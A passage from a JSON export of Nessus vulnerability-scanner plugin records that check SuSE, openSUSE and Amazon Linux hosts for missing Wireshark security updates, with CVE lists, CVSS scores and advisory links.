arbitrary\ncode\n\n(CVE-2010-1455, CVE-2010-2283, CVE-2010-2284, CVE-2010-2285,\nCVE-2010-2286, CVE-2010-2287, CVE-2010-2992, CVE-2010-2993,\nCVE-2010-2994, CVE-2010-2995, CVE-2010-3445, CVE-2010-4300,\nCVE-2010-4301)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=603251\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=613487\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=630599\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=643078\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=655448\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2011-01/msg00004.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected wireshark packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:wireshark\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:wireshark-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/05/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/12/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/05/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"wireshark-1.4.2-1.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"wireshark-devel-1.4.2-1.1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wireshark / wireshark-devel\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:00:49", "description": "This ethereal update fixes the use of uninitialized variables.\n(CVE-2011-1590)", "cvss3": {"score": null, "vector": null}, "published": "2011-06-08T00:00:00", "type": "nessus", "title": "SuSE9 Security Update : ethereal (YOU Patch Number 12708)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-1590"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE9_12708.NASL", "href": "https://www.tenable.com/plugins/nessus/54993", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(54993);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-1590\");\n\n script_name(english:\"SuSE9 Security Update : ethereal (YOU Patch Number 12708)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 9 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This ethereal update fixes the use of uninitialized variables.\n(CVE-2011-1590)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-1590.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply YOU patch number 12708.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/05/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/06/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 9 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SUSE9\", reference:\"ethereal-0.10.13-2.49\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-10-16T02:06:25", "description": "Several flaws were found in Wireshark. If Wireshark read a malformed packet off a network or opened a malicious dump file, it could crash or, possibly, execute arbitrary code as the user running Wireshark.\n\nSeveral denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.", "cvss3": {"score": null, "vector": null}, "published": "2013-09-04T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : wireshark (ALAS-2012-71)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-1143", "CVE-2011-1590"], "modified": "2018-04-18T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:wireshark", "p-cpe:/a:amazon:linux:wireshark-debuginfo", "p-cpe:/a:amazon:linux:wireshark-devel", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2012-71.NASL", "href": "https://www.tenable.com/plugins/nessus/69678", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2012-71.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69678);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/04/18 15:09:34\");\n\n script_cve_id(\"CVE-2011-1143\", \"CVE-2011-1590\");\n script_xref(name:\"ALAS\", value:\"2012-71\");\n script_xref(name:\"RHSA\", value:\"2012:0509\");\n\n script_name(english:\"Amazon Linux AMI : wireshark (ALAS-2012-71)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several flaws were found in Wireshark. If Wireshark read a malformed\npacket off a network or opened a malicious dump file, it could crash\nor, possibly, execute arbitrary code as the user running Wireshark.\n\nSeveral denial of service flaws were found in Wireshark. Wireshark\ncould crash or stop responding if it read a malformed packet off a\nnetwork, or opened a malicious dump file.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2012-71.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update wireshark' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:wireshark\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:wireshark-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:wireshark-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"wireshark-1.2.15-2.10.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"wireshark-debuginfo-1.2.15-2.10.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"wireshark-devel-1.2.15-2.10.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wireshark / wireshark-debuginfo / wireshark-devel\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-08-19T12:59:24", "description": "Wireshark was updated to version 1.4.4 to fix several security issues.", "cvss3": {"score": null, "vector": null}, "published": "2011-12-13T00:00:00", "type": "nessus", "title": "SuSE 10 Security Update : wireshark (ZYPP Patch Number 7438)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-1455", "CVE-2010-2283", "CVE-2010-2284", "CVE-2010-2285", "CVE-2010-2286", "CVE-2010-2287", "CVE-2010-2992", "CVE-2010-2993", "CVE-2010-2994", "CVE-2010-2995", "CVE-2010-3445", "CVE-2010-4300", "CVE-2010-4301", "CVE-2010-4538", "CVE-2011-0444", "CVE-2011-0445", "CVE-2011-0538", "CVE-2011-0713", "CVE-2011-1138", "CVE-2011-1139", "CVE-2011-1140", "CVE-2011-1143"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_WIRESHARK-7438.NASL", "href": "https://www.tenable.com/plugins/nessus/57261", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57261);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2010-1455\", \"CVE-2010-2283\", \"CVE-2010-2284\", \"CVE-2010-2285\", \"CVE-2010-2286\", \"CVE-2010-2287\", \"CVE-2010-2992\", \"CVE-2010-2993\", \"CVE-2010-2994\", \"CVE-2010-2995\", \"CVE-2010-3445\", \"CVE-2010-4300\", \"CVE-2010-4301\", \"CVE-2010-4538\", \"CVE-2011-0444\", \"CVE-2011-0445\", \"CVE-2011-0538\", \"CVE-2011-0713\", \"CVE-2011-1138\", \"CVE-2011-1139\", \"CVE-2011-1140\", \"CVE-2011-1143\");\n\n script_name(english:\"SuSE 10 Security Update : wireshark (ZYPP Patch Number 7438)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\"Wireshark was updated to version 1.4.4 to fix several security issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1455.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2283.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2284.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2285.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2286.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2287.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2992.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2993.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2994.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2995.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3445.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-4300.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-4301.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-4538.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-0444.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-0445.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-0538.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-0713.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-1138.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-1139.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-1140.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-1143.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 7438.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/05/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/03/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"wireshark-1.4.4-0.37.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"wireshark-1.4.4-0.37.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"wireshark-devel-1.4.4-0.37.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:01:22", "description": "Wireshark was updated to version 1.4.4 to fix several security issues", "cvss3": {"score": null, "vector": null}, "published": "2011-04-07T00:00:00", "type": "nessus", "title": "SuSE 11.1 Security Update : wireshark (SAT Patch Number 4267)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-1455", "CVE-2010-2283", "CVE-2010-2284", "CVE-2010-2285", "CVE-2010-2286", "CVE-2010-2287", "CVE-2010-2992", "CVE-2010-2993", "CVE-2010-2994", "CVE-2010-2995", "CVE-2010-3445", "CVE-2010-4300", "CVE-2010-4301", "CVE-2010-4538", "CVE-2011-0444", "CVE-2011-0445", "CVE-2011-0538", "CVE-2011-0713", "CVE-2011-1138", "CVE-2011-1139", "CVE-2011-1140", "CVE-2011-1143"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:wireshark", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_11_WIRESHARK-110331.NASL", "href": "https://www.tenable.com/plugins/nessus/53315", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(53315);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2010-1455\", \"CVE-2010-2283\", \"CVE-2010-2284\", \"CVE-2010-2285\", \"CVE-2010-2286\", \"CVE-2010-2287\", \"CVE-2010-2992\", \"CVE-2010-2993\", \"CVE-2010-2994\", \"CVE-2010-2995\", \"CVE-2010-3445\", \"CVE-2010-4300\", \"CVE-2010-4301\", \"CVE-2010-4538\", \"CVE-2011-0444\", \"CVE-2011-0445\", \"CVE-2011-0538\", \"CVE-2011-0713\", \"CVE-2011-1138\", \"CVE-2011-1139\", \"CVE-2011-1140\", \"CVE-2011-1143\");\n\n script_name(english:\"SuSE 11.1 Security Update : wireshark (SAT Patch Number 4267)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\"Wireshark was updated to version 1.4.4 to fix several security issues\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=603251\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=613487\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=630599\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=643078\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=655448\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=662029\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=669908\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=672916\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=678567\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=678568\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=678569\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=678571\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1455.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2283.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2284.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2285.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2286.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2287.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2992.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2993.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2994.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2995.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3445.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-4300.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-4301.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-4538.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-0444.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-0445.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-0538.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-0713.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-1138.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-1139.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-1140.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-1143.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 4267.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:wireshark\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/03/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/04/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 1) audit(AUDIT_OS_NOT, \"SuSE 11.1\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"wireshark-1.4.4-0.2.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"wireshark-1.4.4-0.2.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"wireshark-1.4.4-0.2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:01:14", "description": "Wireshark was updated to version 1.4.4 to fix several security issues.", "cvss3": {"score": null, "vector": null}, "published": "2011-04-07T00:00:00", "type": "nessus", "title": "SuSE 10 Security Update : wireshark (ZYPP 